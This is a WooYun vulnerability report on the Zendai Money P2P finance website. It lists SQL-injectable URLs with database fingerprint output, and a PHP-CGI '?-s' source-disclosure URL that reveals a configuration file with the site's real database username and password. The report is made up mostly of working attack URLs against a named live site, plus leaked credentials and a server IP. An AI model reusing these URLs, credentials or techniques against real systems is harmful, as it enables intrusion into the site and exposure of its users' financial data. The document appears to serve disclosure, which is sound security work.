P2P金融安全之证大金融SQL注入与任意代码执行漏洞（可导致敏感信息泄露） | wooyun-2015-0120846

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0120846

漏洞标题：

P2P金融安全之证大金融SQL注入与任意代码执行漏洞（可导致敏感信息泄露）

漏洞详情

披露状态：

2015-06-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-07-31：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

第一处：2个SQL注入
http://www.zendaimoney.com/spenewslist.php?typeid=10
http://www.zendaimoney.com/spenewsDetail.php?id=14

Target: 		http://www.zendaimoney.com/spenewslist.php?typeid=10
Host IP:		61.152.239.188
Web Server: 	Apache
Powered-by: 	PHP/5.2.4
DB Server: 	MySQL
Resp. Time(avg):	47 ms
Current User: 	zdtz2011_f@localhost
Sql Version: 	5.0.22-log
Current DB: 	zdtz2011
System User: 	zdtz2011_f@localhost

第二处：php cgi参数注入远程代码执行漏洞
例如：http://www.zendaimoney.com//include//conn.inc.php?-s
http://www.zendaimoney.com//include/config.inc.php?-s

<?php    if(!defined('IN_PHPMYWIND')) exit('Request Error!');
/*
**************************
(C)2010-2013 phpMyWind.com
update: 2012-2-14 17:19:08
**************************
*/
//鏁版嵁搴撴湇鍔″櫒
$db_host = 'localhost';
//鏁版嵁搴撶敤鎴峰悕
$db_user = 'zdtz2011_f';
//鏁版嵁搴撳瘑鐮�
$db_pwd = '51085848';
//鏁版嵁搴撳悕
$db_name = 'zdtz2011';
//鏁版嵁琛ㄥ墠缂€
$db_tablepre = 'jr_';
//鏁版嵁琛ㄧ紪鐮�
$db_charset = 'utf8';
?>

漏洞证明：

综上

修复方案：

你会的

版权声明：转载请注明来源 M4sk@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞